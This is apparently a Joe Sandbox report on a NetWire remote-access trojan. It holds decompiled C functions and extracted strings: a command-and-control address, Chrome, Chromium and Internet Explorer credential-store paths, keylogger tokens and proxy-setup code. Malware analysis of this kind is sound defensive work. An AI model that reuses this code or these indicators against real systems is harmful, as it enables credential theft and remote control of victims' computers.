                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 586562ab7f660d792621f7f3ff03a76942849b748750d6b5247e0080a37609ce
                        • Instruction ID: 24ad92727fe000e7c60640d94de1f7f21ee868b5df478abe0a14dc0806b9406b
                        • Opcode Fuzzy Hash: 586562ab7f660d792621f7f3ff03a76942849b748750d6b5247e0080a37609ce
                        • Instruction Fuzzy Hash: A4D012F0504301AEE710BF51D4057BA7AE8AB41310F41483EA8D086242D77D448D4AA7
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00408AB3(intOrPtr __eax) {
                        				intOrPtr _v20;
                        				signed int _v24;
                        				signed int _t7;
                        				intOrPtr* _t8;
                        
                        				_v20 = 0x422564;
                        				_v24 = 1;
                        				 *_t8 = 0; // executed
                        				L0041F67C(); // executed
                        				 *0x4223d4 = __eax;
                        				_t7 = 1;
                        				if(__eax != 0) {
                        					L0041F5CC();
                        					_t7 = 0 | __eax != 0x000000b7;
                        				}
                        				return _t7;
                        			}

                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c3194e90da334e6e38a89a9e3cd57681737c8a67fcd2182493c3a531e1f22581
                        • Instruction ID: ad06f29d9f34d8de5c37fb948c6dfac14eb5c16bc83129ba4182c5028b8a9bce
                        • Opcode Fuzzy Hash: c3194e90da334e6e38a89a9e3cd57681737c8a67fcd2182493c3a531e1f22581
                        • Instruction Fuzzy Hash: FED05EB4504701AAD714FF2982453993EE05B40308F84843EDC88C3796E3BD81DD8B1B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ../nettle-3.5.1/memxor.c$n & 1$n == 1$o
                        • API String ID: 0-561580802
                        • Opcode ID: c778598c57938beeda3a03c633ed9cdd53ae4a03349816565a6a334ef414175d
                        • Instruction ID: 3ee2903d3d2c0e63440c59b9d95d43c21fe2c472ea4d5dc2fd0c85ac53de4ac0
                        • Opcode Fuzzy Hash: c778598c57938beeda3a03c633ed9cdd53ae4a03349816565a6a334ef414175d
                        • Instruction Fuzzy Hash: BB919E72A083628FC714CF29D48051AFBE2BFD8314F498A2EE8D59B355D735E945CB82
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %s\Google\Chrome\User Data\Default\Login Data$%s\Google\Chrome\User Data\Local State$LOCALAPPDATA
                        • API String ID: 0-1755387443
                        • Opcode ID: 25c53191b8215658669394e1d36e76e7889413c500fa165d3e3269e3eeecf20e
                        • Instruction ID: 71a4254163051be47397212b88bd25a6cdd91ad02d264920333697808a15e276
                        • Opcode Fuzzy Hash: 25c53191b8215658669394e1d36e76e7889413c500fa165d3e3269e3eeecf20e
                        • Instruction Fuzzy Hash: 8E0108F4408311AAC710BF62E44515EBBE0AF80398F51C83EE4D86B282C37C8599CB5A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %s\Chromium\User Data\Default\Login Data$%s\Chromium\User Data\Local State$LOCALAPPDATA
                        • API String ID: 0-2609310803
                        • Opcode ID: 21c6e6d024086da1ece91e8104a1bc99ea1c428e8fdbf93201ad434112c70fdf
                        • Instruction ID: 1af54e81e90a1b2e64d1cb376851d72e513c3029c4754ec5bb28f3db25ee8883
                        • Opcode Fuzzy Hash: 21c6e6d024086da1ece91e8104a1bc99ea1c428e8fdbf93201ad434112c70fdf
                        • Instruction Fuzzy Hash: 8A011AB0408311AAC710BF22E44515EBFE0EF80358F51C83EE4D857282C77C8599CB4B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: @$@$@$[%s]$[-Wld]$[904R5 MY0ddR]$[9Cnd aWgR]$[9Cnd us]$[Ctrl+%s]$[D00Wg aWgR]$[D00Wg md85]$[D00Wg r4nI5]$[D00Wg us]$[MY0Wii mWYw]$[P50i+%Y]$[PCs6 mWYw]$[XR6d05]$[adid5d]$[c0dCw]$[cCYw6sCYd]$[j6Y]$[jR5d0]$[jRS]$[qCV]
                        • API String ID: 0-287945508
                        • Opcode ID: a7201299a71ac298b4eb1a048ca88babafc008e2bbcecdb455fdf88870e38ce2
                        • Instruction ID: 165817b8f912d8248abf4659c11c564849502453b133aa370f8f06421a69fc02
                        • Opcode Fuzzy Hash: a7201299a71ac298b4eb1a048ca88babafc008e2bbcecdb455fdf88870e38ce2
                        • Instruction Fuzzy Hash: 5D815AB0608351DAD720AF59D4C436FBAF4FB81304F51892FE4D566282C3BD49859F6B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E00408417(void* __edx, void* __eflags, char _a4, void* _a12, char _a20, char _a24, void _a36, intOrPtr _a40, intOrPtr _a56, char _a64, char _a65, char _a66, char _a67, char _a68, char _a69, void _a80, void _a88, void _a92, void* _a116, char _a136, char _a180, char _a200) {
                        				char _v0;
                        				void _v7;
                        				void* _v8;
                        				void* _v9;
                        				void* _v10;
                        				void* _v11;
                        				void* _v12;
                        				void* _v13;
                        				void* _v16;
                        				char _v24;
                        				char _v28;
                        				char _v32;
                        				intOrPtr _v36;
                        				char _v40;
                        				char _v44;
                        				void* _v48;
                        				void* _v52;
                        				char _v56;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				void* _v72;
                        				intOrPtr* _t121;
                        				char _t122;
                        				intOrPtr* _t123;
                        				intOrPtr* _t131;
                        				intOrPtr* _t138;
                        				intOrPtr _t150;
                        				int _t152;
                        				void* _t155;
                        				void* _t157;
                        				intOrPtr* _t169;
                        				intOrPtr* _t173;
                        				intOrPtr* _t185;
                        				intOrPtr* _t186;
                        				intOrPtr* _t187;
                        				char _t188;
                        				intOrPtr _t189;
                        				intOrPtr _t190;
                        				void* _t201;
                        				void* _t202;
                        				intOrPtr* _t221;
                        				intOrPtr* _t223;
                        				intOrPtr* _t224;
                        				intOrPtr* _t225;
                        				intOrPtr* _t229;
                        				intOrPtr* _t230;
                        				intOrPtr _t235;
                        				void* _t236;
                        				intOrPtr* _t237;
                        				intOrPtr* _t242;
                        
                        				_t201 = __edx;
                        				_t237 = _t236 - E0041F3F0(0x110c);
                        				_t121 = E004081AA("U4R-55sTsdR");
                        				_v16 = "winhttp.dll";
                        				L0041F55C();
                        				_v16 = _t121;
                        				 *_t237 = _t121;
                        				L0041F5AC();
                        				_push(_t202);
                        				_t185 = _t121;
                        				_v28 = "U4R-55sEd590WfZ_W0u0i";
                        				_t122 = E004081AA(_t202);
                        				_v28 = "winhttp.dll";
                        				L0041F55C();
                        				_v28 = _t122;
                        				_v32 = _t122;
                        				L0041F5AC();
                        				_push(_t201);
                        				_push(_t201);
                        				if(_t185 != 0 && _t122 != 0) {
                        					memcpy( &_a80, L"InternetProxy", 7 << 2);
                        					_t191 = 0;
                        					_v24 = 0;
                        					_v28 = 0;
                        					_v32 = 0;
                        					_v36 = 1;
                        					_v40 =  &_a80;
                        					_a4 = 0;
                        					_t150 =  *_t185();
                        					_t237 = _t237 + 0xc - 0x14;
                        					_t189 = _t150;
                        					if(_t150 != 0) {
                        						_t201 =  &_a24;
                        						_t152 = memset( &_a36, _v16, 6 << 2);
                        						_a36 = 1;
                        						_a40 = 3;
                        						_a56 = 1;
                        						memset(_t201, _t152, 3 << 2);
                        						_t155 = memcpy( &_a88, L"http://www.yandex.com", 0xb << 2);
                        						_t242 = _t237 + 0x24;
                        						_t191 = 0;
                        						_v52 = _t155;
                        						_v48 = _t201;
                        						 *_t242 = _t189;
                        						_v56 =  &_a88;
                        						_t157 = _v0();
                        						_t237 = _t242 - 0x10;
                        						if(_t157 != 0) {
                        							memcpy( &_v7, "socks=", 7);
                        							_t237 = _t237 + 0xc;
                        							_t191 = 0;
                        							_v64 = _t190;
                        							_v68 = _t235;
                        							_v72 =  &_v7;
                        							 *_t237 =  &_a180;
                        							_t169 = E00408306(0, _t248);
                        							if(_t169 != 0) {
                        								 *_t237 = 0x8c;
                        								L0041F714();
                        								_t229 = _t169;
                        								_v68 = 0x40;
                        								_v72 = _t235;
                        								 *_t237 = _t169 + 4;
                        								E00412548();
                        								 *_t229 = 0;
                        								 *_t237 = _t190;
                        								 *((intOrPtr*)(_t229 + 0x44)) = E00412666(0);
                        								_t173 =  *0x42b304;
                        								 *0x42b304 = _t229;
                        								 *((intOrPtr*)(_t229 + 0x88)) = _t173;
                        								 *_t237 = 0x8c;
                        								L0041F714();
                        								_t230 = _t173;
                        								_v68 = 0x40;
                        								_v72 = _t235;
                        								 *_t237 = _t173 + 4;
                        								E00412548();
                        								 *_t230 = 2;
                        								 *_t237 = _t190;
                        								 *((intOrPtr*)(_t230 + 0x44)) = E00412666(0);
                        								 *0x42b304 = _t230;
                        								 *((intOrPtr*)(_t230 + 0x88)) =  *0x42b304;
                        								_v68 = 4;
                        								_v72 = 0x422fa5;
                        								 *_t237 = 0x4223dc;
                        								E00412548();
                        							}
                        						}
                        					}
                        				}
                        				_t123 = E004081AA("U4R-55sEd5Xj90WfZPWR84n_W0PQ00dR5u6d0");
                        				_v40 = "winhttp.dll";
                        				_t186 = _t123;
                        				L0041F55C();
                        				_push(_t191);
                        				_v40 = _t186;
                        				_v44 = _t123;
                        				L0041F5AC();
                        				_push(_t186);
                        				_t221 = _t123;
                        				_push(_t186);
                        				if(_t123 != 0) {
                        					_v52 = 0x10;
                        					L0041F714();
                        					_t187 = _t123;
                        					_v52 = _t123;
                        					_t123 =  *_t221();
                        					_t251 = _t123;
                        					_push(_t201);
                        					if(_t123 != 0) {
                        						_v48 = "%S";
                        						_t188 =  &_a20;
                        						_v52 = 0x1000;
                        						_t233 =  &_a136;
                        						_v44 =  *((intOrPtr*)(_t187 + 8));
                        						_v56 =  &_a200;
                        						E004127A8();
                        						E00412588( &_a200, 0x422f70, 0x1000);
                        						_v44 = _t188;
                        						_v48 =  &_a136;
                        						_a64 = 0x68;
                        						_a65 = 0x74;
                        						_v52 =  &_a64;
                        						_a66 = 0x74;
                        						_a67 = 0x70;
                        						_a68 = 0x3d;
                        						_v56 =  &_a200;
                        						_a69 = 0;
                        						_t131 = E00408306(_t191, _t251);
                        						_t252 = _t131;
                        						if(_t131 != 0) {
                        							_v56 = 0x8c;
                        							L0041F714();
                        							_t225 = _t131;
                        							E00412548(_t131 + 4, _t233, 0x40);
                        							 *_t225 = 3;
                        							_v56 = _t188;
                        							 *((intOrPtr*)(_t225 + 0x44)) = E00412666(_t191);
                        							 *0x42b304 = _t225;
                        							 *((intOrPtr*)(_t225 + 0x88)) =  *0x42b304;
                        							E00412548(0x4223dc, 0x422fa5, 4);
                        						}
                        						memcpy( &_a92, "socks=", 7);
                        						_t237 = _t237 + 0xc;
                        						_t123 = E00408306(0, _t252,  &_a200,  &_a92, _t233, _t188);
                        						if(_t123 != 0) {
                        							_v56 = 0x8c;
                        							L0041F714();
                        							_t223 = _t123;
                        							E00412548(_t123 + 4, _t233, 0x40);
                        							 *_t223 = 2;
                        							_v56 = _t188;
                        							 *((intOrPtr*)(_t223 + 0x44)) = E00412666(0);
                        							_t138 =  *0x42b304;
                        							 *0x42b304 = _t223;
                        							 *((intOrPtr*)(_t223 + 0x88)) = _t138;
                        							_v56 = 0x8c;
                        							L0041F714();
                        							_t224 = _t138;
                        							E00412548(_t138 + 4, _t233, 0x40);
                        							 *_t224 = 0;
                        							_v56 = _t188;
                        							 *((intOrPtr*)(_t224 + 0x44)) = E00412666(0);
                        							 *0x42b304 = _t224;
                        							 *((intOrPtr*)(_t224 + 0x88)) =  *0x42b304;
                        							_t123 = E00412548(0x4223dc, 0x422fa5, 4);
                        						}
                        					}
                        				}
                        				return _t123;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 001$=$=$@$InternetProxy$U4R-55sEd590WfZ_W0u0i$U4R-55sEd5Xj90WfZPWR84n_W0PQ00dR5u6d0$U4R-55sTsdR$h$h$http://www.yandex.com$p$p$socks=$t$t$t$t$winhttp.dll
                        • API String ID: 0-337019666
                        • Opcode ID: 5ae4fd168ad160b687ec016b66311f032f2127d997e6a72b6d5e7ab802d206c0
                        • Instruction ID: 129794d27e18b5d836c16bc2de0120feea3297db44a07732c008f05b0d4f5d07
                        • Opcode Fuzzy Hash: 5ae4fd168ad160b687ec016b66311f032f2127d997e6a72b6d5e7ab802d206c0
                        • Instruction Fuzzy Hash: 09D1F5B0508740AFD710EF25C68479ABBF0BF84744F418C2EE5C897351EBB99989CB5A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: )$A$D$D$G$H$I$I$N$P$R$T
                        • API String ID: 0-4026286603
                        • Opcode ID: f7e0d66e6706360943002546ce2ae5a522dee07f1adf161bc0e3ce1e523a7a0e
                        • Instruction ID: 7b50295ee95f3483ab7dff93a2a89c17451d79e52031df4d4eaf42e24e8d509c
                        • Opcode Fuzzy Hash: f7e0d66e6706360943002546ce2ae5a522dee07f1adf161bc0e3ce1e523a7a0e
                        • Instruction Fuzzy Hash: 14A1D27110D3809ED311DB69C48438FFFE1ABA6308F44895EE5C89B382D7B99989CB57
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 45%
                        			E0040262F(signed int __ecx, signed int __edx, intOrPtr _a4) {
                        				char _v608;
                        				char _v624;
                        				char _v868;
                        				char _v876;
                        				char _v916;
                        				intOrPtr _v936;
                        				signed short _v944;
                        				signed short _v948;
                        				intOrPtr _v964;
                        				intOrPtr _v968;
                        				signed short _v972;
                        				intOrPtr _v976;
                        				signed short _v980;
                        				char _v988;
                        				signed short _v996;
                        				signed short _v1000;
                        				signed short _v1004;
                        				signed short _v1008;
                        				signed int _v1010;
                        				signed short _v1012;
                        				signed short _v1014;
                        				intOrPtr _v1016;
                        				signed int _v1018;
                        				char* _v1020;
                        				signed short _v1022;
                        				signed short _v1024;
                        				signed short _v1028;
                        				signed short _v1032;
                        				signed short _v1036;
                        				signed int _v1040;
                        				signed int _v1048;
                        				signed short _v1052;
                        				signed short _v1056;
                        				signed int _v1060;
                        				signed int _v1064;
                        				signed int _v1068;
                        				signed int _v1072;
                        				signed int _v1076;
                        				char _v1080;
                        				signed int _v1084;
                        				signed int _v1088;
                        				signed int _v1092;
                        				signed int _v1096;
                        				intOrPtr _t139;
                        				intOrPtr _t140;
                        				intOrPtr _t141;
                        				intOrPtr* _t144;
                        				signed short _t147;
                        				void* _t150;
                        				void* _t162;
                        				void* _t163;
                        				signed short _t164;
                        				void* _t165;
                        				signed short _t168;
                        				void* _t169;
                        				signed int _t170;
                        				signed int _t179;
                        				signed short _t182;
                        				void* _t183;
                        				signed short _t186;
                        				void* _t187;
                        				signed int _t188;
                        				void* _t192;
                        				signed int _t193;
                        				signed int _t206;
                        				intOrPtr* _t211;
                        				signed int _t213;
                        				signed int _t214;
                        				signed int _t216;
                        				signed int _t217;
                        				signed int _t219;
                        				signed int _t220;
                        				signed int _t223;
                        				signed int _t231;
                        				signed short* _t232;
                        				signed int _t233;
                        				signed int _t234;
                        				signed int _t235;
                        				signed int _t236;
                        				signed short* _t237;
                        				signed short* _t238;
                        				void* _t239;
                        				signed int* _t240;
                        
                        				_t223 = __edx;
                        				_t220 = __ecx;
                        				_t237 =  &_v1004;
                        				E0041236C( &_v944,  &_v944, 0x8000);
                        				_t139 = E00407F7A(_t223, "iphlpapi.dll");
                        				_v1020 = "psapi.dll";
                        				_v976 = _t139;
                        				_t140 = E00407F7A(_t223);
                        				_v1020 = "kernel32.dll";
                        				_v968 = _t140;
                        				_t141 = E00407F7A(_t223);
                        				_v1020 = "Ed5jf5dRSdSqYsqCVid";
                        				_v964 = _t141;
                        				_t144 = E00407F8E(_t223, _v976, E004081AA());
                        				_v1020 = "Ed5jf5dRSdSuSsqCVid";
                        				_t211 = _t144;
                        				_t147 = E00407F8E(_t223, _v976, E004081AA());
                        				_v1020 = "Ed590WYd66XlCnd_4idLCldD";
                        				_v972 = _t147;
                        				_t150 = E00407F8E(_t223, _v968, E004081AA());
                        				if(_t150 == 0) {
                        					_t150 = E00407F8E(_t223, _v964, E004081AA("Ed590WYd66XlCnd_4idLCldD"));
                        				}
                        				_t224 = _t223 & 0xffffff00 | _t211 == 0x00000000;
                        				_t222 = _t220 & 0xffffff00 | _v972 == 0x00000000 | _t223 & 0xffffff00 | _t211 == 0x00000000;
                        				if((_t220 & 0xffffff00 | _v972 == 0x00000000 | _t223 & 0xffffff00 | _t211 == 0x00000000) != 0 || _t150 == 0) {
                        					L24:
                        					_t212 =  &_v944;
                        					if(_v936 == 0) {
                        						_v1008 = 0;
                        						_v1012 = 0;
                        						_v1016 = 0xe5;
                        					} else {
                        						_v1008 = E00412540( &_v944);
                        						_v1016 = 0xe4;
                        						_v1012 = _v944;
                        					}
                        					E00405D7D(_t224, _a4);
                        					E004123B1(_t212);
                        					E00407FAB(_v976);
                        					E00407FAB(_v968);
                        					return E00407FAB(_v964);
                        				} else {
                        					_t232 =  &_v948;
                        					_v948 = 0;
                        					_v1000 = 0;
                        					_v1004 = 5;
                        					_v1008 = 2;
                        					_v1012 = 1;
                        					_v1016 = _t232;
                        					_v1020 = 0;
                        					_t162 =  *_t211();
                        					_t238 = _t237 - 0x18;
                        					if(_t162 != 0x7a) {
                        						L14:
                        						_t213 =  &_v972;
                        						_v972 = 0;
                        						_v1024 = 0;
                        						_v1028 = 1;
                        						_v1032 = 2;
                        						_v1036 = 1;
                        						_v1040 = _t213;
                        						 *_t238 = 0;
                        						_t163 = _v996();
                        						_t239 = _t238 - 0x18;
                        						if(_t163 != 0x7a) {
                        							goto L24;
                        						}
                        						_t164 = _v996;
                        						_v1068 = _t164;
                        						L0041F714();
                        						_v1000 = _t164;
                        						if(_t164 == 0) {
                        							goto L24;
                        						}
                        						_v1048 = 0;
                        						_v1052 = 1;
                        						_v1056 = 2;
                        						_v1060 = 1;
                        						_v1064 = _t213;
                        						_v1068 = _t164;
                        						_t165 = _v1020();
                        						_t240 = _t239 - 0x18;
                        						if(_t165 != 0) {
                        							L22:
                        							if(_v1024 != 0) {
                        								E00407F59( &_v1024);
                        							}
                        							goto L24;
                        						}
                        						_t233 = 0;
                        						_t235 =  &_v876;
                        						while(1) {
                        							_t168 = _v1024;
                        							if(_t233 >=  *_t168) {
                        								goto L22;
                        							}
                        							_t214 = _t233 * 0xc;
                        							_t169 = _t168 + _t214;
                        							_t170 =  *(_t169 + 8) & 0x0000ffff;
                        							_v1092 = _t170;
                        							L0041F914();
                        							_v1096 =  *((intOrPtr*)(_t169 + 4));
                        							_v1048 = _t170;
                        							L0041F924();
                        							_v1088 = _t170;
                        							_v1092 = 0x422c01;
                        							_v1096 = 0x40;
                        							_v1084 = _v1052 & 0x0000ffff;
                        							 *_t240 =  &_v1012;
                        							E004127A8();
                        							_v1092 = 0x104;
                        							_v1096 = _t235;
                        							 *_t240 =  *(_v1032 + _t214 + 0xc);
                        							E00402570(_t222, _t224, __eflags, _t222, _t224);
                        							_v1080 =  &_v1012;
                        							_t216 =  &_v624;
                        							_v1088 = _t235;
                        							_v1092 = 0x422c07;
                        							_v1096 = 0x204;
                        							 *_t240 = _t216;
                        							_v1084 =  *((intOrPtr*)(_t214 + _v1032 + 0xc));
                        							_t179 = E004127A8();
                        							__eflags = _t179;
                        							if(_t179 > 0) {
                        								_v1092 = _t179;
                        								_v1096 = _t216;
                        								 *_t240 =  &_v1024;
                        								E00412458( &_v1024, _t224);
                        							}
                        							_t233 = _t233 + 1;
                        							__eflags = _t233;
                        						}
                        						goto L22;
                        					}
                        					_t182 = _v972;
                        					 *_t238 = _t182;
                        					L0041F714();
                        					_v980 = _t182;
                        					if(_t182 == 0) {
                        						goto L24;
                        					}
                        					_v1024 = 0;
                        					_v1028 = 5;
                        					_v1032 = 2;
                        					_v1036 = 1;
                        					_v1040 = _t232;
                        					 *_t238 = _t182;
                        					_t183 =  *_t211();
                        					_t238 = _t238 - 0x18;
                        					if(_t183 != 0) {
                        						L12:
                        						if(_v1004 != 0) {
                        							E00407F59( &_v1004);
                        						}
                        						goto L14;
                        					}
                        					_t234 = 0;
                        					_t236 =  &_v916;
                        					while(1) {
                        						_t186 = _v1004;
                        						if(_t234 >=  *_t186) {
                        							goto L12;
                        						}
                        						_t217 = _t234 * 0x18;
                        						_t187 = _t186 + _t217;
                        						_t188 =  *(_t187 + 0xc) & 0x0000ffff;
                        						_v1068 = _t188;
                        						L0041F914();
                        						_v1072 =  *((intOrPtr*)(_t187 + 8));
                        						_v1010 = _t188;
                        						L0041F924();
                        						_v1064 = _t188;
                        						_v1068 = "%s:%u";
                        						_v1072 = 0x40;
                        						_v1060 = _v1014 & 0x0000ffff;
                        						_v1076 =  &_v988;
                        						E004127A8();
                        						_t192 = _v1012 + _t217;
                        						_t193 =  *(_t192 + 0x14) & 0x0000ffff;
                        						_v1076 = _t193;
                        						L0041F914();
                        						_v1080 =  *((intOrPtr*)(_t192 + 0x10));
                        						_v1018 = _t193;
                        						L0041F924();
                        						_v1072 = _t193;
                        						_v1076 = "%s:%u";
                        						_v1080 = 0x40;
                        						_v1084 = _t236;
                        						_v1068 = _v1022 & 0x0000ffff;
                        						_t231 =  &_v868;
                        						E004127A8(_t222, _t224, _t222, _t224);
                        						_v1076 = 0x104;
                        						E00402570(_t222, _t224, __eflags, ( &(_v1020[_t217]))[0x18], _t231);
                        						_v1056 = E004081AA( *((intOrPtr*)(0x422ca0 + ( &(_v1020[_t217]))[4] * 4)));
                        						_v1060 = _t236;
                        						_v1064 =  &_v996;
                        						_t219 =  &_v608;
                        						_v1072 = _t231;
                        						_v1076 = 0x422bed;
                        						_v1080 = 0x204;
                        						_v1084 = _t219;
                        						_v1068 = ( &(_v1020[_t217]))[0x18];
                        						_t206 = E004127A8();
                        						__eflags = _t206;
                        						if(_t206 > 0) {
                        							E00412458( &_v1008, _t224,  &_v1008, _t219, _t206);
                        						}
                        						_t234 = _t234 + 1;
                        						__eflags = _t234;
                        					}
                        					goto L12;
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %s:%d$%s:%u$@$Ed590WYd66XlCnd_4idLCldD$Ed5jf5dRSdSqYsqCVid$Ed5jf5dRSdSuSsqCVid$iphlpapi.dll$kernel32.dll$psapi.dll
                        • API String ID: 0-1859760768
                        • Opcode ID: ecfa040b99fdd072a25a0974f1507886e54ec2cabcd5e23ee5df752222c6d893
                        • Instruction ID: 64c6eb304da1bd60933a222d55b1bae016526deff2b752f498ff56c04a6099ea
                        • Opcode Fuzzy Hash: ecfa040b99fdd072a25a0974f1507886e54ec2cabcd5e23ee5df752222c6d893
                        • Instruction Fuzzy Hash: 28D1A3B4908341ABC710AF65C58965EFBF0BF84748F418C2EF8C897291D7B9D988CB56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $ $ $%Rand%$HostId$HostId-APRIL$Install Date$SOFTWARE\NetWire
                        • API String ID: 0-308283549
                        • Opcode ID: 8d9fa1ce1227cd48d07afd670ca600cc309de693e6a65e3e096cff891438ab6d
                        • Instruction ID: 4d253b419a98ff4c59b7894da0d5b96d3c68cf9a0106b0f9d5c8600cdd8dc3cd
                        • Opcode Fuzzy Hash: 8d9fa1ce1227cd48d07afd670ca600cc309de693e6a65e3e096cff891438ab6d
                        • Instruction Fuzzy Hash: BE3193B0109311ABD700AF11D68929FBBE1AF80748F51CC1EE5D85B256D7FE8588CB9B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: &$001$064$075$C:\Users\user\AppData\Roaming\Logs\$HostId-APRIL$Password$chongmei33.myddns.rocks:49703;
                        • API String ID: 0-4217033083
                        • Opcode ID: 35587c5c701385df943a746cf7bb302fd0de4502a5840f6354f21f0f9562dd1c
                        • Instruction ID: d012676997c43d0a4f60e6223c36ad427c2154accf07b5176cb32dd979716e27
                        • Opcode Fuzzy Hash: 35587c5c701385df943a746cf7bb302fd0de4502a5840f6354f21f0f9562dd1c
                        • Instruction Fuzzy Hash: 3E3100B0109711AAD300EF56D2D925EBEE0BF84748F91CC2EE1C94B251C7F985C99B97
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $/$A$E$K$Software\Microsoft\Internet Explorer\IntelliForms\Storage2$rb+
                        • API String ID: 0-417429986
                        • Opcode ID: 17987caa90f594d4a55626d029de0f9e4765c5bc8f064db7406c04733c776cae
                        • Instruction ID: b3a366508a3bf55356eea0268f728a85e1b25c4e3c11778993a5dcbc8714eb01
                        • Opcode Fuzzy Hash: 17987caa90f594d4a55626d029de0f9e4765c5bc8f064db7406c04733c776cae
                        • Instruction Fuzzy Hash: B2A1C2B09083419BD710EFA5C18465BBBE0AF85358F00882EF5D897391D7B9D989DF4A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "%s"$-m "%s"$C:\Users\user\AppData\Roaming\Logs\$M5QV9C5I$MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56\%6$MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\$rb+
                        • API String ID: 0-740420096
                        • Opcode ID: 997c129668c957d265a6ef581973f80193b3a19ca8de808bc7fa0e786e146993
                        • Instruction ID: cf1332e757baf714fb04fabdc2a14f291af18396ddc48b811abeeedaa7cc8274
                        • Opcode Fuzzy Hash: 997c129668c957d265a6ef581973f80193b3a19ca8de808bc7fa0e786e146993
                        • Instruction Fuzzy Hash: 4D61C7B04087119AD710BF61D64536EBBE1AF81348F41C86EE4C86B383CBBD8985DB5B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $C:\Users\user\AppData\Roaming\Logs\$PATH$Password$Unknown$WINDIR$chongmei33.myddns.rocks:49703;
                        • API String ID: 0-1034412746
                        • Opcode ID: 1d897faeec5f9ead515169eab6bed68e0673cd8fb9b034d1bed7294f75ea0837
